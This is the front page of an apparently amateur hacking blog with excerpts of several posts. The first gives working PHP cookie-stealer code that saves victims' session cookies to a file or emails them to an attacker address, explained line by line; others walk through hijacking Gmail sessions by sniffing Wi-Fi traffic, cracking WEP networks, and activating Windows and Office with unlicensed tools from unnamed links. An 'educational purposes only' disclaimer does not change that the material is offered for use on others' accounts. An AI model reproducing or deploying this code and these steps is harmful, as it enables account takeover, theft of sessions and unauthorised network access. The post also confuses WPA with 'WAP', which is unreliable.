Skip to main content

Posts

Create cookie stealer in PHP? get via email

<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()   ...

Hack A Gmail Account using Packet Sniffer

Whenever someone logs into Gmail (or any other login service), a file called a "cookie" is sent to their computer. This cookie allows the user to stay logged in, even if they leave Gmail. A packet sniffer can find cookies being transferred over a wireless network. When you find a Gmail cookie, you can open it on your computer and potentially access your target's inbox. You'll need to be connected to the same wireless network as your target. Requirement 1. Wireshark 2. Cookie Cadger. Download and install Wireshark. Wireshark is a free network monitoring utility that you can download from wireshark.org. It is available for Windows, Mac, and Linux. Installing Wireshark is a straightforward process. Follow the prompts like you would with most programs. Download Cookie Cadger. This is a Java program that will will find and intercept cookies being sent across the wireless network. Cookie Cadger doesn't need to be installed. It works the same in ...

Hacking Any WiFi Network

TWO MOST EASIEST WAYS METHODS TO CRACK WIFI PASSWORD Method 1  First of all you need to scan for available wireless networks. you can use“ NetStumbler ” or “ Kismet ” for Windows and Linux and " KisMac " for Mac. It’ll also show how the Wi-fi network is encrypted. The two most common encryption techniques are: 1) WEP (Wire Equivalent Privacy ) 2) WAP(Wireless Application Protocol) WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network.It can’t be easily cracked as WEP because the only way to retrieve a  WAP key is to use a brute-force attack or dictionary attack.  How to Crack WEP To crack WEP we will be using Live Linux distribution called Back Track to crack WEP. Back Track have lots of preinstalled software's but for this time.The tools we will be using on Backtrack are: a)Kismet – a wireless network detector b)airodump – captures packets from a wireless rou...

How to activate Microsoft Windows And Microsoft Office All Versions

Tired on Seeing " Windows not Activated" Here i will Explain some simple steps to remove this annoying message Step 1 - download the tool from the links windows 7 windows 8 windows 8.1 windows 10 MS Office(All Versions) Step 2 - Once you have downloaded the tool. open the tool  ( Run as Administrator)  step 3 - Now click on install, and Wait for few seconds. A pop up will appear for restart you computer. Thats it you have successfully Activated your Product.

Step By Step Guide to Install Windows 10

There are multiple ways to install Windows 10. we are going to discuss some of them here. 1. Using Media Creation Tool Download the tool from here . It will automatically check your system configuration and start downloading the windows 10 from Microsoft server. This tool is an easy to upgrade medium if you are on any previous version of windows. The only drawback of this is you cannot use this tool if your Computer is offline. you can also use this tool to create a installation media to install windows on other computer. 2. Using a Disc Image (ISO File) If you already have a iso file windows to downloaded with you. you can use that to use that to create a window installation media. If not you can download that from here . once downloaded you can use any bootable media creating tool like Rufus . Once downloaded you can select your iso file and removable disk from which you want to install windows. 3. Without Using a Removable disk  If you don't have any flash driv...

DISCLAIMER

Your usage of this website constitutes your agreement to the following terms. 1. All the information provided on this site are for educational purposes only.The site is no way responsible for any misuse of the information. 2. The words "Hack" and "Hacking" should be taken or considered as "Ethical Hack" or "Ethical Hacking". 3. The posts intended or titled "password cracking" are actually added to allow readers recover their lost or forgotten passwords and not for cracking any other email account password. 4. Implementation of hacks explained by us is sole responsibility of user and " anonymoushackingbytravis.blogspot.com " is not responsible for any damages caused by the hacks explained in this site .

FAQs

Before doing hacking lets know something about it. * What is Hacking? * Who is a Hacker? * Who is a Cracker? * Who is a Script Kiddy? * What skills do I need to become a Hacker? * What is the best way to learn Hacking? * How do I secure my computer from being Hacked? What is Hacking? Computer hacking is the practice of modifying computer hardware and software to accomplish a goal outside of the creator’s original purpose.Hacking is the art of exploiting the flaws/loopholes in a software/module.Since the word “hack” has long been used to describe someone who is incompetent at his/her profession, some hackers claim this term is offensive and fails to give appropriate recognition to their skills. Who is a Hacker? A Hacker or White Hat Hacker, also known as Ethical Hacker, is a Computer Security expert, who specialise in penetration testing, and other testing methodologies, to ensure that a company’s information systems are secure. Such people are employed by companies wh...